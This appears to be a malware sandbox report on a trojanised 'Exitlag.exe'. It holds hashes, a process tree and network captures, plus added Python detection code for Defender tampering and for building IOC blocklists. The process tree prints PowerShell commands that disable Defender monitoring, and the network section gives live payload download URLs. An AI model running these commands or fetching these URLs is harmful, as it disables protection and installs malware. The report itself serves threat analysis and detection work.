Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    06-01-2025 07:11

General

  • Target

    Exitlag/Exitlag.exe

  • Size

    71.1MB

  • MD5

    50c9ab0b2423ac229c46cc00fe90bc3c

  • SHA1

    e0bee49bc0120aa8f84b65a26cb2d25e943e5b79

  • SHA256

    b4ddfe40ced34d89fc71db575c2a68c17c79551338411f012a2f28764c09a870

  • SHA512

    de0c0c2bb751c7fddbf8c5502dbc6b88414754b839f66fa7930c8e6788b69e2394b4040b0dfcad4b3add97dee9094b2f97fa2b1b5dd11165eb59bfe6714ac4f9

  • SSDEEP

    3072:Dc69mBoayt0cg6rlagjm2lXImnS7meRtZUBRPhutDFdM3fkdJ41:D/m2a7cxx59nxGtZykDFdIB

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Exitlag\Exitlag.exe
    "C:\Users\Admin\AppData\Local\Temp\Exitlag\Exitlag.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1032
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ExecutionPolicy Bypass -Command "Set-MpPreference -UILockdown $true"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:356
    • C:\Users\Admin\AppData\Local\Temp\butty.exe
      "C:\Users\Admin\AppData\Local\Temp\butty.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2964
      • C:\Users\Admin\AppData\Local\Temp\butty.exe
        "C:\Users\Admin\AppData\Local\Temp\butty.exe"
        3⤵
        • Executes dropped EXE
        PID:2724
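
The process tree above shows two behaviours worth turning into detection logic: Exitlag.exe launches powershell.exe with -ExecutionPolicy Bypass to run Set-MpPreference (disabling Defender real-time monitoring, then locking the Defender UI), and butty.exe launches a second copy of its own image while the sandbox flags SetThreadContext and WriteProcessMemory in the parent, the shape that hollowing/RunPE-style injection produces. The following is an added example, not code from the sandbox or from the sample; it runs over process-creation events constructed here from the tree above plus one benign Get-MpPreference call. The tampering-parameter list and the four-letter minimum on parameter abbreviations are assumptions chosen for the example.

```python
"""Detect Defender tampering via Set-/Add-MpPreference and self-spawned
processes in process-creation telemetry.  Added example; events below are
constructed from the sandbox process tree, not exported from it."""
import re
from dataclasses import dataclass

# Set-MpPreference / Add-MpPreference parameters that weaken Defender.
# Assumption: this list is illustrative, not exhaustive.
TAMPER_PARAMS = (
    "DisableRealtimeMonitoring",
    "DisableBehaviorMonitoring",
    "DisableIOAVProtection",
    "DisableScriptScanning",
    "UILockdown",
    "ExclusionPath",
    "ExclusionProcess",
    "ExclusionExtension",
)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXITLAG = r"C:\Users\Admin\AppData\Local\Temp\Exitlag\Exitlag.exe"
BUTTY = r"C:\Users\Admin\AppData\Local\Temp\butty.exe"

# Constructed events mirroring the report's tree; ppid 1 / 900 are assumptions.
EVENTS = [
    ProcEvent(1600, 1, EXITLAG, f'"{EXITLAG}"'),
    ProcEvent(1032, 1600, PS, '"powershell.exe" -ExecutionPolicy Bypass '
              '-Command "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    ProcEvent(356, 1600, PS, '"powershell.exe" -ExecutionPolicy Bypass '
              '-Command "Set-MpPreference -UILockdown $true"'),
    ProcEvent(2964, 1600, BUTTY, f'"{BUTTY}"'),
    ProcEvent(2724, 2964, BUTTY, f'"{BUTTY}"'),
    ProcEvent(4100, 900, PS, 'powershell.exe -Command "Get-MpPreference"'),  # benign
]


def defender_tampering(cmdline: str) -> list:
    """Return the tampering parameters a Set-/Add-MpPreference command line sets.

    PowerShell accepts any unambiguous parameter prefix (-DisableRealtime works
    for -DisableRealtimeMonitoring), so tokens are matched as prefixes of the
    known names rather than literally.  Tokens shorter than four letters are
    ignored to keep noise down (assumption)."""
    if not re.search(r"\b(set|add)-mppreference\b", cmdline, re.I):
        return []
    hits = []
    for tok in re.findall(r"-([A-Za-z]{4,})", cmdline):
        for param in TAMPER_PARAMS:
            if param.lower().startswith(tok.lower()) and param not in hits:
                hits.append(param)
    return hits


def self_spawned(events) -> list:
    """Return (parent_pid, child_pid) pairs where a process launched a copy of
    its own image path, as butty.exe (2964 -> 2724) does above.  On its own this
    is only a hint; paired with SetThreadContext/WriteProcessMemory on the
    parent it is the classic hollowing pattern."""
    by_pid = {e.pid: e for e in events}
    pairs = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is not None and parent.image.lower() == e.image.lower():
            pairs.append((parent.pid, e.pid))
    return pairs


def triage(events) -> list:
    """Combine both checks and attribute each finding to the launching image."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        params = defender_tampering(e.cmdline)
        if params:
            parent = by_pid.get(e.ppid)
            origin = parent.image if parent else "<unknown parent>"
            findings.append(f"pid {e.pid}: Defender tampering {params} launched by {origin}")
    for ppid, pid in self_spawned(events):
        findings.append(f"pid {pid}: self-spawned from pid {ppid} ({by_pid[pid].image})")
    return findings


if __name__ == "__main__":
    for line in triage(EVENTS):
        print(line)
```

Note that the benign Get-MpPreference call produces no finding, and that both Set-MpPreference findings point back to an executable running from a user's Temp directory, which is the detail an analyst would use to separate this from an administrator's scripted hardening.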

Network

  • flag-us
    DNS
    moondarklight.me
    Exitlag.exe
    Remote address:
    8.8.8.8:53
    Request
    moondarklight.me
    IN A
    Response
    moondarklight.me
    IN A
    104.21.40.53
    moondarklight.me
    IN A
    172.67.176.118
  • flag-us
    GET
    https://moondarklight.me/oops.exe
    Exitlag.exe
    Remote address:
    104.21.40.53:443
    Request
    GET /oops.exe HTTP/1.1
    Host: moondarklight.me
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Mon, 06 Jan 2025 07:11:21 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=14400
    CF-Cache-Status: STALE
    Age: 29412
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ze9glAbFMHdmDh1plSDzb7tlp8XGvJhn8d4rUU5a%2FY83fjxh7qJ4yV%2B3GUfdWW4gY7sJ%2BotdlyKGghV4z7vwKskO026VHGbNnO98Wpl5dRenWT%2FwGStj6B2W50ysMYmZZDwV"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd9e4bd8e2b651f-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=63909&min_rtt=59947&rtt_var=19282&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2858&recv_bytes=355&delivery_rate=57304&cwnd=253&unsent_bytes=0&cid=7beccaed76cab983&ts=186&x=0"
  • flag-us
    DNS
    bellingthesun.com
    Exitlag.exe
    Remote address:
    8.8.8.8:53
    Request
    bellingthesun.com
    IN A
    Response
    bellingthesun.com
    IN A
    172.67.142.117
    bellingthesun.com
    IN A
    104.21.95.4
  • flag-us
    GET
    https://bellingthesun.com/haskitime/butty.exe
    Exitlag.exe
    Remote address:
    172.67.142.117:443
    Request
    GET /haskitime/butty.exe HTTP/1.1
    Host: bellingthesun.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 07:11:21 GMT
    Content-Type: application/octet-stream
    Content-Length: 3276800
    Connection: keep-alive
    Last-Modified: Wed, 25 Dec 2024 16:48:54 GMT
    ETag: "676c3776-320000"
    Cache-Control: max-age=14400
    CF-Cache-Status: HIT
    Age: 991
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BlJ%2BwmOtVuvQNFO99fB8vEH5%2BMC9ENq7%2F701R4s9IZwZiUpq6cD0ubCxSykM%2BuJW%2FDNJvW9PFV%2BgJnK7a92IfqSVhIG96jjdnvq7kck2fidlzFmx6HLmi56EBq%2BHRQA0%2Fru7BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd9e4bfca7aedf2-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=60568&min_rtt=59347&rtt_var=14653&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2857&recv_bytes=372&delivery_rate=63382&cwnd=253&unsent_bytes=0&cid=b9d0d0bd8e740aa3&ts=143&x=0"
  • 104.21.40.53:443
    https://moondarklight.me/oops.exe
    tls, http
    Exitlag.exe
    757 B
    4.3kB
    9
    9

    HTTP Request

    GET https://moondarklight.me/oops.exe

    HTTP Response

    404
  • 172.67.142.117:443
    https://bellingthesun.com/haskitime/butty.exe
    tls, http
    Exitlag.exe
    86.0kB
    3.4MB
    1704
    2448

    HTTP Request

    GET https://bellingthesun.com/haskitime/butty.exe

    HTTP Response

    200
  • 8.8.8.8:53
    moondarklight.me
    dns
    Exitlag.exe
    62 B
    94 B
    1
    1

    DNS Request

    moondarklight.me

    DNS Response

    104.21.40.53
    172.67.176.118

  • 8.8.8.8:53
    bellingthesun.com
    dns
    Exitlag.exe
    63 B
    95 B
    1
    1

    DNS Request

    bellingthesun.com

    DNS Response

    172.67.142.117
    104.21.95.4
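
Two things about the network section deserve a check before the observables go into a blocklist. First, every resolved address sits in Cloudflare's edge space, so the IPs are shared by thousands of unrelated sites and blocking them would be wrong; the durable indicators are the hostnames and URLs. Second, the butty.exe response carries an nginx-style ETag ("<hex mtime>-<hex size>"), and the two fields can be decoded and compared against Last-Modified and Content-Length to confirm the cached object is the origin's file rather than a CDN placeholder. The block below is an added example, not sandbox code; the response data is constructed from the headers shown above, and the two Cloudflare prefixes are assumed to be taken from Cloudflare's published IPv4 list.

```python
"""Network IOC triage for the two HTTPS fetches in the report: CDN-aware
blocklisting plus an nginx ETag consistency check.  Added example; the
OBSERVED records are constructed from the report's headers."""
import ipaddress
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from urllib.parse import urlsplit

# Two of the IPv4 prefixes Cloudflare publishes for its edge (assumption:
# list is current); the four resolved addresses above all fall inside them.
CLOUDFLARE_V4 = [ipaddress.ip_network(n) for n in ("104.16.0.0/13", "172.64.0.0/13")]

OBSERVED = [
    {
        "url": "https://moondarklight.me/oops.exe",
        "ips": ["104.21.40.53", "172.67.176.118"],
        "status": 404,
        "headers": {"Content-Type": "text/html", "Server": "cloudflare",
                    "CF-Cache-Status": "STALE", "Age": "29412"},
    },
    {
        "url": "https://bellingthesun.com/haskitime/butty.exe",
        "ips": ["172.67.142.117", "104.21.95.4"],
        "status": 200,
        "headers": {"Content-Type": "application/octet-stream",
                    "Content-Length": "3276800",
                    "Last-Modified": "Wed, 25 Dec 2024 16:48:54 GMT",
                    "ETag": '"676c3776-320000"',
                    "Server": "cloudflare", "CF-Cache-Status": "HIT", "Age": "991"},
    },
]


def is_cdn_shared(ip: str) -> bool:
    """True when the address is a shared CDN edge and must not be blocked."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_V4)


def blocklist(observed) -> dict:
    """Hostnames and URLs always; IPs only when they are not CDN-shared."""
    out = {"domains": set(), "urls": set(), "ips": set()}
    for o in observed:
        out["domains"].add(urlsplit(o["url"]).hostname)
        out["urls"].add(o["url"])
        out["ips"].update(ip for ip in o["ips"] if not is_cdn_shared(ip))
    return out


def decode_nginx_etag(etag: str):
    """nginx's default ETag is "<hex mtime>-<hex size>"; return (mtime, size)."""
    mtime_hex, size_hex = etag.strip('"').split("-")
    return (datetime.fromtimestamp(int(mtime_hex, 16), tz=timezone.utc),
            int(size_hex, 16))


def etag_consistent(headers) -> bool:
    """True when the ETag's mtime and size agree with Last-Modified and
    Content-Length, i.e. the served body is the origin's on-disk file."""
    try:
        mtime, size = decode_nginx_etag(headers["ETag"])
        last_modified = parsedate_to_datetime(headers["Last-Modified"])
        return mtime == last_modified and size == int(headers["Content-Length"])
    except (KeyError, ValueError):
        return False


def delivered_executable(o) -> bool:
    """A 200 with an octet-stream body for an .exe path is the "Downloads
    MZ/PE file" signature's network side; the 404 for oops.exe is not."""
    path = urlsplit(o["url"]).path.lower()
    return (o["status"] == 200
            and o["headers"].get("Content-Type") == "application/octet-stream"
            and path.endswith(".exe"))


def stale_cached_response(o) -> bool:
    """A STALE cache hit means the 404 came from Cloudflare's cache, not from
    the origin at fetch time; the payload may still exist on the origin."""
    return o["headers"].get("CF-Cache-Status") == "STALE"


if __name__ == "__main__":
    print(blocklist(OBSERVED))
    for o in OBSERVED:
        print(o["url"], delivered_executable(o), etag_consistent(o["headers"]),
              stale_cached_response(o))
```

For the butty.exe response the decoded ETag gives 2024-12-25T16:48:54Z and 3,276,800 bytes, matching Last-Modified and Content-Length exactly; that also dates the payload to eleven days before this submission. The oops.exe 404 was a STALE cache entry (Age 29412, about eight hours), so the first-stage URL should be treated as possibly live rather than dead.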

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YRO1RRF07MK0XF749642.temp

    Filesize

    7KB

    MD5

    55e88676417c13a7e183aee45a993a31

    SHA1

    3a01dea4eeaef4bda242da6bd5c26e555fd0e6fd

    SHA256

    fe1ccfcc20b52014494bc031b4ce38a0078a18b813c442a2c52882e8937eae60

    SHA512

    e0829a444e9c35a8afc9261c95bd2cee7a9245ae0e1d5d21b80720c3a305b26252a21b99e9def079bbe2f2045a576e398a3eaad5fdad960d385c47d9555b1731

  • \Users\Admin\AppData\Local\Temp\butty.exe

    Filesize

    3.1MB

    MD5

    3c3a898442526b47ad166a3774263e3e

    SHA1

    3e468fdc7ca16461f934559391d70b7296693d97

    SHA256

    5be48844ce2ddefeac5d05580d420cb64990e82e89504b930cfb30962a5ce441

    SHA512

    22ccaed307c4a2ab16ab3eb1dc00deff233f3d734730193d65c2a52bb208da8ab68c98e4605b3846c28fcc6b0106e5e2e31c52161d073e6eae75cd955beb89fd

  • memory/356-22-0x00000000022C0000-0x00000000022C8000-memory.dmp

    Filesize

    32KB

  • memory/356-21-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

  • memory/1032-9-0x00000000028E0000-0x00000000028E8000-memory.dmp

    Filesize

    32KB

  • memory/1032-15-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-10-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-11-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-14-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-13-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-12-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-7-0x000007FEEDCCE000-0x000007FEEDCCF000-memory.dmp

    Filesize

    4KB

  • memory/1032-8-0x000000001B480000-0x000000001B762000-memory.dmp

    Filesize

    2.9MB

  • memory/1600-0-0x000007FEF5AB3000-0x000007FEF5AB4000-memory.dmp

    Filesize

    4KB

  • memory/1600-2-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

    Filesize

    9.9MB

  • memory/1600-1-0x0000000000870000-0x0000000004F9A000-memory.dmp

    Filesize

    71.2MB

  • memory/1600-28-0x000007FEF5AB3000-0x000007FEF5AB4000-memory.dmp

    Filesize

    4KB

  • memory/1600-33-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

    Filesize

    9.9MB

  • memory/1600-34-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

    Filesize

    9.9MB

  • memory/2724-31-0x000007FFFFFDA000-0x000007FFFFFDB000-memory.dmp

    Filesize

    4KB
